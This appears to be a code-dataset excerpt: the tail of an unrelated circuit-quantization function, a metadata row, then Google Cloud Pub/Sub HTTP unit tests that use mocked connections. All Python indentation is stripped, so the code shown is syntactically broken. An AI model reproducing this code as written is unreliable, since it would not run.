assert zmat.shape == (nf, nj, nj)
imY = (1/zmat[:, 0, 0]).imag
# zeros where the sign changes from negative to positive
(zeros,) = np.where((imY[:-1] <= 0) & (imY[1:] > 0))
nz = len(zeros)
imYs = np.array([1 / zmat[:, i, i] for i in range(nj)]).imag
f0s = np.zeros(nz)
slopes = np.zeros((nj, nz))
import matplotlib.pyplot as plt
# Fit a second order polynomial in the region around the zero
# Extract the exact location of the zero and the assocated slope
# If you need better than second order fit, you're not sampling finely enough
for i, z in enumerate(zeros):
f0_guess = (freqs[z+1] + freqs[z]) / 2
zero_polys = np.polyfit(
freqs[z-1:z+3] - f0_guess, imYs[:, z-1:z+3].transpose(), 2)
zero_polys = zero_polys.transpose()
f0s[i] = f0 = min(np.roots(zero_polys[0]),
key=lambda r: abs(r)) + f0_guess
for j, p in enumerate(zero_polys):
slopes[j, i] = np.polyval(np.polyder(p), f0 - f0_guess)
if show_fit:
plt.plot(freqs[z-1:z+3] - f0_guess, imYs[:, z-1:z +
3].transpose(), lw=1, ls='--', marker='o', label=str(f0))
p = np.poly1d(zero_polys[0, :])
p2 = np.poly1d(zero_polys[1, :])
plt.plot(freqs[z-1:z+3] - f0_guess, p(freqs[z-1:z+3] - f0_guess))
plt.plot(freqs[z-1:z+3] - f0_guess, p2(freqs[z-1:z+3] - f0_guess))
plt.legend(loc=0)
zeffs = 2 / (slopes * f0s[np.newaxis, :])
# Take signs with respect to first port
zsigns = np.sign(zmat[zeros, 0, :])
fzpfs = zsigns.transpose() * np.sqrt(hbar * abs(zeffs) / 2)
H = black_box_hamiltonian(f0s, ljs, fzpfs, cos_trunc, fock_trunc)
return make_dispersive(H, fock_trunc, fzpfs, f0s)
black_box_hamiltonian_nq = black_box_hamiltonian_nq
| 42.813333
| 536
| 0.616007
|
794fe093bbb31b83d8b9e55012c0df569dfdd145
| 43,417
|
py
|
Python
|
pubsub/tests/unit/test__http.py
|
rodrigodias27/google-cloud-python
|
7d1161f70744c0dbbe67a3f472ea95667eaafe50
|
[
"Apache-2.0"
] | null | null | null |
pubsub/tests/unit/test__http.py
|
rodrigodias27/google-cloud-python
|
7d1161f70744c0dbbe67a3f472ea95667eaafe50
|
[
"Apache-2.0"
] | null | null | null |
pubsub/tests/unit/test__http.py
|
rodrigodias27/google-cloud-python
|
7d1161f70744c0dbbe67a3f472ea95667eaafe50
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import mock
def _make_credentials():
import google.auth.credentials
return mock.Mock(spec=google.auth.credentials.Credentials)
class _Base(unittest.TestCase):
PROJECT = 'PROJECT'
LIST_TOPICS_PATH = 'projects/%s/topics' % (PROJECT,)
LIST_SNAPSHOTS_PATH = 'projects/%s/snapshots' % (PROJECT,)
LIST_SUBSCRIPTIONS_PATH = 'projects/%s/subscriptions' % (PROJECT,)
TOPIC_NAME = 'topic_name'
TOPIC_PATH = 'projects/%s/topics/%s' % (PROJECT, TOPIC_NAME)
LIST_TOPIC_SUBSCRIPTIONS_PATH = '%s/subscriptions' % (TOPIC_PATH,)
SNAPSHOT_NAME = 'snapshot_name'
SNAPSHOT_PATH = 'projects/%s/snapshots/%s' % (PROJECT, SNAPSHOT_NAME)
SUB_NAME = 'subscription_name'
SUB_PATH = 'projects/%s/subscriptions/%s' % (PROJECT, SUB_NAME)
def _make_one(self, *args, **kw):
return self._get_target_class()(*args, **kw)
class TestConnection(_Base):
@staticmethod
def _get_target_class():
from google.cloud.pubsub._http import Connection
return Connection
def test_default_url(self):
conn = self._make_one(object())
klass = self._get_target_class()
self.assertEqual(conn.api_base_url, klass.API_BASE_URL)
def test_custom_url_from_env(self):
from google.cloud.environment_vars import PUBSUB_EMULATOR
HOST = 'localhost:8187'
fake_environ = {PUBSUB_EMULATOR: HOST}
with mock.patch('os.environ', new=fake_environ):
conn = self._make_one(object())
klass = self._get_target_class()
self.assertNotEqual(conn.api_base_url, klass.API_BASE_URL)
self.assertEqual(conn.api_base_url, 'http://' + HOST)
def test_build_api_url_no_extra_query_params(self):
conn = self._make_one(object())
URI = '/'.join([
conn.API_BASE_URL,
conn.API_VERSION,
'foo',
])
self.assertEqual(conn.build_api_url('/foo'), URI)
def test_build_api_url_w_extra_query_params(self):
from six.moves.urllib.parse import parse_qsl
from six.moves.urllib.parse import urlsplit
conn = self._make_one(object())
uri = conn.build_api_url('/foo', {'bar': 'baz'})
scheme, netloc, path, qs, _ = urlsplit(uri)
self.assertEqual('%s://%s' % (scheme, netloc), conn.API_BASE_URL)
self.assertEqual(path,
'/'.join(['', conn.API_VERSION, 'foo']))
parms = dict(parse_qsl(qs))
self.assertEqual(parms['bar'], 'baz')
def test_build_api_url_w_base_url_override(self):
base_url1 = 'api-base-url1'
base_url2 = 'api-base-url2'
conn = self._make_one(object())
conn.api_base_url = base_url1
URI = '/'.join([
base_url2,
conn.API_VERSION,
'foo',
])
self.assertEqual(conn.build_api_url('/foo', api_base_url=base_url2),
URI)
def test_extra_headers(self):
import requests
from google.cloud import _http as base_http
from google.cloud.pubsub import _http as MUT
http = mock.create_autospec(requests.Session, instance=True)
response = requests.Response()
response.status_code = 200
data = b'brent-spiner'
response._content = data
http.request.return_value = response
client = mock.Mock(_http=http, spec=['_http'])
conn = self._make_one(client)
req_data = 'req-data-boring'
result = conn.api_request(
'GET', '/rainbow', data=req_data, expect_json=False)
self.assertEqual(result, data)
expected_headers = {
'Accept-Encoding': 'gzip',
base_http.CLIENT_INFO_HEADER: MUT._CLIENT_INFO,
'User-Agent': conn.USER_AGENT,
}
expected_uri = conn.build_api_url('/rainbow')
http.request.assert_called_once_with(
data=req_data,
headers=expected_headers,
method='GET',
url=expected_uri,
)
class Test_PublisherAPI(_Base):
@staticmethod
def _get_target_class():
from google.cloud.pubsub._http import _PublisherAPI
return _PublisherAPI
def _make_one(self, *args, **kw):
return self._get_target_class()(*args, **kw)
def test_ctor(self):
connection = _Connection()
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
self.assertIs(api._client, client)
self.assertEqual(api.api_request, connection.api_request)
def test_list_topics_no_paging(self):
from google.cloud.pubsub.topic import Topic
returned = {'topics': [{'name': self.TOPIC_PATH}]}
connection = _Connection(returned)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
iterator = api.list_topics(self.PROJECT)
topics = list(iterator)
next_token = iterator.next_page_token
self.assertEqual(len(topics), 1)
topic = topics[0]
self.assertIsInstance(topic, Topic)
self.assertEqual(topic.name, self.TOPIC_NAME)
self.assertEqual(topic.full_name, self.TOPIC_PATH)
self.assertIsNone(next_token)
self.assertEqual(connection._called_with['method'], 'GET')
path = '/%s' % (self.LIST_TOPICS_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['query_params'], {})
def test_list_topics_with_paging(self):
import six
from google.cloud.pubsub.topic import Topic
TOKEN1 = 'TOKEN1'
TOKEN2 = 'TOKEN2'
SIZE = 1
RETURNED = {
'topics': [{'name': self.TOPIC_PATH}],
'nextPageToken': 'TOKEN2',
}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
iterator = api.list_topics(
self.PROJECT, page_token=TOKEN1, page_size=SIZE)
page = six.next(iterator.pages)
topics = list(page)
next_token = iterator.next_page_token
self.assertEqual(len(topics), 1)
topic = topics[0]
self.assertIsInstance(topic, Topic)
self.assertEqual(topic.name, self.TOPIC_NAME)
self.assertEqual(topic.full_name, self.TOPIC_PATH)
self.assertEqual(next_token, TOKEN2)
self.assertEqual(connection._called_with['method'], 'GET')
path = '/%s' % (self.LIST_TOPICS_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['query_params'],
{'pageToken': TOKEN1, 'pageSize': SIZE})
def test_list_topics_missing_key(self):
returned = {}
connection = _Connection(returned)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
iterator = api.list_topics(self.PROJECT)
topics = list(iterator)
next_token = iterator.next_page_token
self.assertEqual(len(topics), 0)
self.assertIsNone(next_token)
self.assertEqual(connection._called_with['method'], 'GET')
path = '/%s' % (self.LIST_TOPICS_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['query_params'], {})
def test_topic_create(self):
RETURNED = {'name': self.TOPIC_PATH}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
resource = api.topic_create(self.TOPIC_PATH)
self.assertEqual(resource, RETURNED)
self.assertEqual(connection._called_with['method'], 'PUT')
path = '/%s' % (self.TOPIC_PATH,)
self.assertEqual(connection._called_with['path'], path)
def test_topic_create_already_exists(self):
from google.cloud.exceptions import Conflict
connection = _Connection()
connection._no_response_error = Conflict
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
with self.assertRaises(Conflict):
api.topic_create(self.TOPIC_PATH)
self.assertEqual(connection._called_with['method'], 'PUT')
path = '/%s' % (self.TOPIC_PATH,)
self.assertEqual(connection._called_with['path'], path)
def test_topic_get_hit(self):
RETURNED = {'name': self.TOPIC_PATH}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
resource = api.topic_get(self.TOPIC_PATH)
self.assertEqual(resource, RETURNED)
self.assertEqual(connection._called_with['method'], 'GET')
path = '/%s' % (self.TOPIC_PATH,)
self.assertEqual(connection._called_with['path'], path)
def test_topic_get_miss(self):
from google.cloud.exceptions import NotFound
connection = _Connection()
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
with self.assertRaises(NotFound):
api.topic_get(self.TOPIC_PATH)
self.assertEqual(connection._called_with['method'], 'GET')
path = '/%s' % (self.TOPIC_PATH,)
self.assertEqual(connection._called_with['path'], path)
def test_topic_delete_hit(self):
RETURNED = {}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
api.topic_delete(self.TOPIC_PATH)
self.assertEqual(connection._called_with['method'], 'DELETE')
path = '/%s' % (self.TOPIC_PATH,)
self.assertEqual(connection._called_with['path'], path)
def test_topic_delete_miss(self):
from google.cloud.exceptions import NotFound
connection = _Connection()
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
with self.assertRaises(NotFound):
api.topic_delete(self.TOPIC_PATH)
self.assertEqual(connection._called_with['method'], 'DELETE')
path = '/%s' % (self.TOPIC_PATH,)
self.assertEqual(connection._called_with['path'], path)
def test_topic_publish_hit(self):
import base64
PAYLOAD = b'This is the message text'
B64_PAYLOAD = base64.b64encode(PAYLOAD).decode('ascii')
MSGID = 'DEADBEEF'
MESSAGE = {'data': PAYLOAD, 'attributes': {}}
B64MSG = {'data': B64_PAYLOAD, 'attributes': {}}
RETURNED = {'messageIds': [MSGID]}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
resource = api.topic_publish(self.TOPIC_PATH, [MESSAGE])
self.assertEqual(resource, [MSGID])
self.assertEqual(connection._called_with['method'], 'POST')
path = '/%s:publish' % (self.TOPIC_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['data'],
{'messages': [B64MSG]})
msg_data = connection._called_with['data']['messages'][0]['data']
self.assertEqual(msg_data, B64_PAYLOAD)
def test_topic_publish_twice(self):
import base64
PAYLOAD = b'This is the message text'
B64_PAYLOAD = base64.b64encode(PAYLOAD).decode('ascii')
MESSAGE = {'data': PAYLOAD, 'attributes': {}}
RETURNED = {'messageIds': []}
connection = _Connection(RETURNED, RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
api.topic_publish(self.TOPIC_PATH, [MESSAGE])
api.topic_publish(self.TOPIC_PATH, [MESSAGE])
messages = connection._called_with['data']['messages']
self.assertEqual(len(messages), 1)
self.assertEqual(messages[0]['data'], B64_PAYLOAD)
def test_topic_publish_miss(self):
import base64
from google.cloud.exceptions import NotFound
PAYLOAD = b'This is the message text'
B64_PAYLOAD = base64.b64encode(PAYLOAD).decode('ascii')
MESSAGE = {'data': PAYLOAD, 'attributes': {}}
B64MSG = {'data': B64_PAYLOAD, 'attributes': {}}
connection = _Connection()
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
with self.assertRaises(NotFound):
api.topic_publish(self.TOPIC_PATH, [MESSAGE])
self.assertEqual(connection._called_with['method'], 'POST')
path = '/%s:publish' % (self.TOPIC_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['data'],
{'messages': [B64MSG]})
def test_topic_list_subscriptions_no_paging(self):
from google.cloud.pubsub.topic import Topic
from google.cloud.pubsub.subscription import Subscription
local_sub_path = 'projects/%s/subscriptions/%s' % (
self.PROJECT, self.SUB_NAME)
RETURNED = {'subscriptions': [local_sub_path]}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
topic = Topic(self.TOPIC_NAME, client)
iterator = api.topic_list_subscriptions(topic)
subscriptions = list(iterator)
next_token = iterator.next_page_token
self.assertIsNone(next_token)
self.assertEqual(len(subscriptions), 1)
subscription = subscriptions[0]
self.assertIsInstance(subscription, Subscription)
self.assertEqual(subscription.name, self.SUB_NAME)
self.assertEqual(subscription.topic, topic)
self.assertIs(subscription._client, client)
self.assertEqual(connection._called_with['method'], 'GET')
path = '/%s' % (self.LIST_TOPIC_SUBSCRIPTIONS_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['query_params'], {})
def test_topic_list_subscriptions_with_paging(self):
import six
from google.cloud.pubsub.subscription import Subscription
from google.cloud.pubsub.topic import Topic
TOKEN1 = 'TOKEN1'
TOKEN2 = 'TOKEN2'
SIZE = 1
local_sub_path = 'projects/%s/subscriptions/%s' % (
self.PROJECT, self.SUB_NAME)
RETURNED = {
'subscriptions': [local_sub_path],
'nextPageToken': TOKEN2,
}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
topic = Topic(self.TOPIC_NAME, client)
iterator = api.topic_list_subscriptions(
topic, page_token=TOKEN1, page_size=SIZE)
page = six.next(iterator.pages)
subscriptions = list(page)
next_token = iterator.next_page_token
self.assertEqual(next_token, TOKEN2)
self.assertEqual(len(subscriptions), 1)
subscription = subscriptions[0]
self.assertIsInstance(subscription, Subscription)
self.assertEqual(subscription.name, self.SUB_NAME)
self.assertEqual(subscription.topic, topic)
self.assertIs(subscription._client, client)
self.assertEqual(connection._called_with['method'], 'GET')
path = '/%s' % (self.LIST_TOPIC_SUBSCRIPTIONS_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['query_params'],
{'pageToken': TOKEN1, 'pageSize': SIZE})
def test_topic_list_subscriptions_missing_key(self):
from google.cloud.pubsub.topic import Topic
connection = _Connection({})
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
topic = Topic(self.TOPIC_NAME, client)
iterator = api.topic_list_subscriptions(topic)
subscriptions = list(iterator)
next_token = iterator.next_page_token
self.assertEqual(len(subscriptions), 0)
self.assertIsNone(next_token)
self.assertEqual(connection._called_with['method'], 'GET')
path = '/%s' % (self.LIST_TOPIC_SUBSCRIPTIONS_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['query_params'], {})
def test_topic_list_subscriptions_miss(self):
from google.cloud.exceptions import NotFound
from google.cloud.pubsub.topic import Topic
connection = _Connection()
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
with self.assertRaises(NotFound):
topic = Topic(self.TOPIC_NAME, client)
list(api.topic_list_subscriptions(topic))
self.assertEqual(connection._called_with['method'], 'GET')
path = '/%s' % (self.LIST_TOPIC_SUBSCRIPTIONS_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['query_params'], {})
class Test_SubscriberAPI(_Base):
@staticmethod
def _get_target_class():
from google.cloud.pubsub._http import _SubscriberAPI
return _SubscriberAPI
def _make_one(self, *args, **kw):
return self._get_target_class()(*args, **kw)
def test_ctor(self):
connection = _Connection()
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
self.assertIs(api._client, client)
self.assertEqual(api.api_request, connection.api_request)
def test_list_subscriptions_no_paging(self):
from google.cloud.pubsub.client import Client
from google.cloud.pubsub.subscription import Subscription
from google.cloud.pubsub.topic import Topic
SUB_INFO = {'name': self.SUB_PATH, 'topic': self.TOPIC_PATH}
RETURNED = {'subscriptions': [SUB_INFO]}
connection = _Connection(RETURNED)
creds = _make_credentials()
client = Client(project=self.PROJECT, credentials=creds)
client._connection = connection
api = self._make_one(client)
iterator = api.list_subscriptions(self.PROJECT)
subscriptions = list(iterator)
next_token = iterator.next_page_token
# Check the token returned.
self.assertIsNone(next_token)
# Check the subscription object returned.
self.assertEqual(len(subscriptions), 1)
subscription = subscriptions[0]
self.assertIsInstance(subscription, Subscription)
self.assertEqual(subscription.name, self.SUB_NAME)
self.assertIsInstance(subscription.topic, Topic)
self.assertEqual(subscription.topic.name, self.TOPIC_NAME)
self.assertIs(subscription._client, client)
self.assertEqual(subscription.project, self.PROJECT)
self.assertIsNone(subscription.ack_deadline)
self.assertIsNone(subscription.push_endpoint)
self.assertEqual(connection._called_with['method'], 'GET')
path = '/%s' % (self.LIST_SUBSCRIPTIONS_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['query_params'], {})
def test_list_subscriptions_with_paging(self):
import six
from google.cloud.pubsub.client import Client
from google.cloud.pubsub.subscription import Subscription
from google.cloud.pubsub.topic import Topic
TOKEN1 = 'TOKEN1'
TOKEN2 = 'TOKEN2'
SIZE = 1
SUB_INFO = {'name': self.SUB_PATH, 'topic': self.TOPIC_PATH}
RETURNED = {
'subscriptions': [SUB_INFO],
            'nextPageToken': TOKEN2,
}
connection = _Connection(RETURNED)
creds = _make_credentials()
client = Client(project=self.PROJECT, credentials=creds)
client._connection = connection
api = self._make_one(client)
iterator = api.list_subscriptions(
self.PROJECT, page_token=TOKEN1, page_size=SIZE)
page = six.next(iterator.pages)
subscriptions = list(page)
next_token = iterator.next_page_token
# Check the token returned.
self.assertEqual(next_token, TOKEN2)
# Check the subscription object returned.
self.assertEqual(len(subscriptions), 1)
subscription = subscriptions[0]
self.assertIsInstance(subscription, Subscription)
self.assertEqual(subscription.name, self.SUB_NAME)
self.assertIsInstance(subscription.topic, Topic)
self.assertEqual(subscription.topic.name, self.TOPIC_NAME)
self.assertIs(subscription._client, client)
self.assertEqual(subscription.project, self.PROJECT)
self.assertIsNone(subscription.ack_deadline)
self.assertIsNone(subscription.push_endpoint)
self.assertEqual(connection._called_with['method'], 'GET')
path = '/%s' % (self.LIST_SUBSCRIPTIONS_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['query_params'],
{'pageToken': TOKEN1, 'pageSize': SIZE})
def test_list_subscriptions_missing_key(self):
RETURNED = {}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
iterator = api.list_subscriptions(self.PROJECT)
subscriptions = list(iterator)
next_token = iterator.next_page_token
self.assertEqual(len(subscriptions), 0)
self.assertIsNone(next_token)
self.assertEqual(connection._called_with['method'], 'GET')
path = '/%s' % (self.LIST_SUBSCRIPTIONS_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['query_params'], {})
def test_subscription_create_defaults(self):
RESOURCE = {'topic': self.TOPIC_PATH}
RETURNED = RESOURCE.copy()
RETURNED['name'] = self.SUB_PATH
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
resource = api.subscription_create(self.SUB_PATH, self.TOPIC_PATH)
self.assertEqual(resource, RETURNED)
self.assertEqual(connection._called_with['method'], 'PUT')
path = '/%s' % (self.SUB_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['data'], RESOURCE)
def test_subscription_create_retain_messages(self):
import datetime
RESOURCE = {'topic': self.TOPIC_PATH,
'retainAckedMessages': True,
'messageRetentionDuration': {
'seconds': 1729,
'nanos': 2718 * 1000
}
}
RETURNED = RESOURCE.copy()
RETURNED['name'] = self.SUB_PATH
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
resource = api.subscription_create(
self.SUB_PATH, self.TOPIC_PATH,
retain_acked_messages=True,
message_retention_duration=datetime.timedelta(
seconds=1729, microseconds=2718))
self.assertEqual(resource, RETURNED)
self.assertEqual(connection._called_with['method'], 'PUT')
path = '/%s' % (self.SUB_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['data'], RESOURCE)
def test_subscription_create_explicit(self):
ACK_DEADLINE = 90
PUSH_ENDPOINT = 'https://api.example.com/push'
RESOURCE = {
'topic': self.TOPIC_PATH,
'ackDeadlineSeconds': ACK_DEADLINE,
'pushConfig': {
'pushEndpoint': PUSH_ENDPOINT,
},
}
RETURNED = RESOURCE.copy()
RETURNED['name'] = self.SUB_PATH
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
resource = api.subscription_create(
self.SUB_PATH, self.TOPIC_PATH,
ack_deadline=ACK_DEADLINE, push_endpoint=PUSH_ENDPOINT)
self.assertEqual(resource, RETURNED)
self.assertEqual(connection._called_with['method'], 'PUT')
path = '/%s' % (self.SUB_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['data'], RESOURCE)
def test_subscription_get(self):
ACK_DEADLINE = 90
PUSH_ENDPOINT = 'https://api.example.com/push'
RETURNED = {
'topic': self.TOPIC_PATH,
'name': self.SUB_PATH,
'ackDeadlineSeconds': ACK_DEADLINE,
'pushConfig': {'pushEndpoint': PUSH_ENDPOINT},
}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
resource = api.subscription_get(self.SUB_PATH)
self.assertEqual(resource, RETURNED)
self.assertEqual(connection._called_with['method'], 'GET')
path = '/%s' % (self.SUB_PATH,)
self.assertEqual(connection._called_with['path'], path)
def test_subscription_delete(self):
RETURNED = {}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
api.subscription_delete(self.SUB_PATH)
self.assertEqual(connection._called_with['method'], 'DELETE')
path = '/%s' % (self.SUB_PATH,)
self.assertEqual(connection._called_with['path'], path)
def test_subscription_modify_push_config(self):
PUSH_ENDPOINT = 'https://api.example.com/push'
BODY = {
'pushConfig': {'pushEndpoint': PUSH_ENDPOINT},
}
RETURNED = {}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
api.subscription_modify_push_config(self.SUB_PATH, PUSH_ENDPOINT)
self.assertEqual(connection._called_with['method'], 'POST')
path = '/%s:modifyPushConfig' % (self.SUB_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['data'], BODY)
def test_subscription_pull_defaults(self):
import base64
PAYLOAD = b'This is the message text'
B64 = base64.b64encode(PAYLOAD).decode('ascii')
ACK_ID = 'DEADBEEF'
MSG_ID = 'BEADCAFE'
MESSAGE = {'messageId': MSG_ID, 'data': B64, 'attributes': {'a': 'b'}}
RETURNED = {
'receivedMessages': [{'ackId': ACK_ID, 'message': MESSAGE}],
}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
BODY = {
'returnImmediately': False,
'maxMessages': 1,
}
received = api.subscription_pull(self.SUB_PATH)
self.assertEqual(received, RETURNED['receivedMessages'])
self.assertEqual(received[0]['message']['data'], PAYLOAD)
self.assertEqual(connection._called_with['method'], 'POST')
path = '/%s:pull' % (self.SUB_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['data'], BODY)
def test_subscription_pull_explicit(self):
import base64
PAYLOAD = b'This is the message text'
B64 = base64.b64encode(PAYLOAD).decode('ascii')
ACK_ID = 'DEADBEEF'
MSG_ID = 'BEADCAFE'
MESSAGE = {'messageId': MSG_ID, 'data': B64, 'attributes': {'a': 'b'}}
RETURNED = {
'receivedMessages': [{'ackId': ACK_ID, 'message': MESSAGE}],
}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
MAX_MESSAGES = 10
BODY = {
'returnImmediately': True,
'maxMessages': MAX_MESSAGES,
}
received = api.subscription_pull(
self.SUB_PATH, return_immediately=True, max_messages=MAX_MESSAGES)
self.assertEqual(received, RETURNED['receivedMessages'])
self.assertEqual(connection._called_with['method'], 'POST')
path = '/%s:pull' % (self.SUB_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['data'], BODY)
def test_subscription_acknowledge(self):
ACK_ID1 = 'DEADBEEF'
ACK_ID2 = 'BEADCAFE'
BODY = {
'ackIds': [ACK_ID1, ACK_ID2],
}
RETURNED = {}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
api.subscription_acknowledge(self.SUB_PATH, [ACK_ID1, ACK_ID2])
self.assertEqual(connection._called_with['method'], 'POST')
path = '/%s:acknowledge' % (self.SUB_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['data'], BODY)
def test_subscription_modify_ack_deadline(self):
ACK_ID1 = 'DEADBEEF'
ACK_ID2 = 'BEADCAFE'
NEW_DEADLINE = 90
BODY = {
'ackIds': [ACK_ID1, ACK_ID2],
'ackDeadlineSeconds': NEW_DEADLINE,
}
RETURNED = {}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
api.subscription_modify_ack_deadline(
self.SUB_PATH, [ACK_ID1, ACK_ID2], NEW_DEADLINE)
self.assertEqual(connection._called_with['method'], 'POST')
path = '/%s:modifyAckDeadline' % (self.SUB_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['data'], BODY)
def test_list_snapshots_no_paging(self):
from google.cloud.pubsub.client import Client
from google.cloud.pubsub.snapshot import Snapshot
local_snapshot_path = 'projects/%s/snapshots/%s' % (
self.PROJECT, self.SNAPSHOT_NAME)
local_topic_path = 'projects/%s/topics/%s' % (
self.PROJECT, self.TOPIC_NAME)
RETURNED = {'snapshots': [{
'name': local_snapshot_path,
'topic': local_topic_path,
}],
}
connection = _Connection(RETURNED)
creds = _make_credentials()
client = Client(project=self.PROJECT, credentials=creds)
client._connection = connection
api = self._make_one(client)
iterator = api.list_snapshots(self.PROJECT)
snapshots = list(iterator)
next_token = iterator.next_page_token
self.assertIsNone(next_token)
self.assertEqual(len(snapshots), 1)
snapshot = snapshots[0]
self.assertIsInstance(snapshot, Snapshot)
self.assertEqual(snapshot.topic.name, self.TOPIC_NAME)
self.assertIs(snapshot._client, client)
self.assertEqual(connection._called_with['method'], 'GET')
path = '/%s' % (self.LIST_SNAPSHOTS_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['query_params'], {})
def test_list_snapshots_with_paging(self):
import six
from google.cloud.pubsub.client import Client
from google.cloud.pubsub.snapshot import Snapshot
TOKEN1 = 'TOKEN1'
TOKEN2 = 'TOKEN2'
SIZE = 1
local_snapshot_path = 'projects/%s/snapshots/%s' % (
self.PROJECT, self.SNAPSHOT_NAME)
local_topic_path = 'projects/%s/topics/%s' % (
self.PROJECT, self.TOPIC_NAME)
RETURNED = {
'snapshots': [{
'name': local_snapshot_path,
'topic': local_topic_path,
}],
'nextPageToken': TOKEN2,
}
connection = _Connection(RETURNED)
creds = _make_credentials()
client = Client(project=self.PROJECT, credentials=creds)
client._connection = connection
api = self._make_one(client)
iterator = api.list_snapshots(
self.PROJECT, page_token=TOKEN1, page_size=SIZE)
page = six.next(iterator.pages)
snapshots = list(page)
next_token = iterator.next_page_token
self.assertEqual(next_token, TOKEN2)
self.assertEqual(len(snapshots), 1)
snapshot = snapshots[0]
self.assertIsInstance(snapshot, Snapshot)
self.assertEqual(snapshot.topic.name, self.TOPIC_NAME)
self.assertIs(snapshot._client, client)
self.assertEqual(connection._called_with['method'], 'GET')
path = '/%s' % (self.LIST_SNAPSHOTS_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['query_params'],
{'pageToken': TOKEN1, 'pageSize': SIZE})
def test_subscription_seek_snapshot(self):
local_snapshot_path = 'projects/%s/snapshots/%s' % (
self.PROJECT, self.SNAPSHOT_NAME)
RETURNED = {}
BODY = {
'snapshot': local_snapshot_path
}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
api.subscription_seek(
self.SUB_PATH, snapshot=local_snapshot_path)
self.assertEqual(connection._called_with['method'], 'POST')
path = '/%s:seek' % (self.SUB_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['data'], BODY)
def test_subscription_seek_time(self):
time = '12345'
RETURNED = {}
BODY = {
'time': time
}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
api.subscription_seek(self.SUB_PATH, time=time)
self.assertEqual(connection._called_with['method'], 'POST')
path = '/%s:seek' % (self.SUB_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['data'], BODY)
def test_snapshot_create(self):
RETURNED = {
'name': self.SNAPSHOT_PATH,
'subscription': self.SUB_PATH
}
BODY = {
'subscription': self.SUB_PATH
}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
resource = api.snapshot_create(self.SNAPSHOT_PATH, self.SUB_PATH)
self.assertEqual(resource, RETURNED)
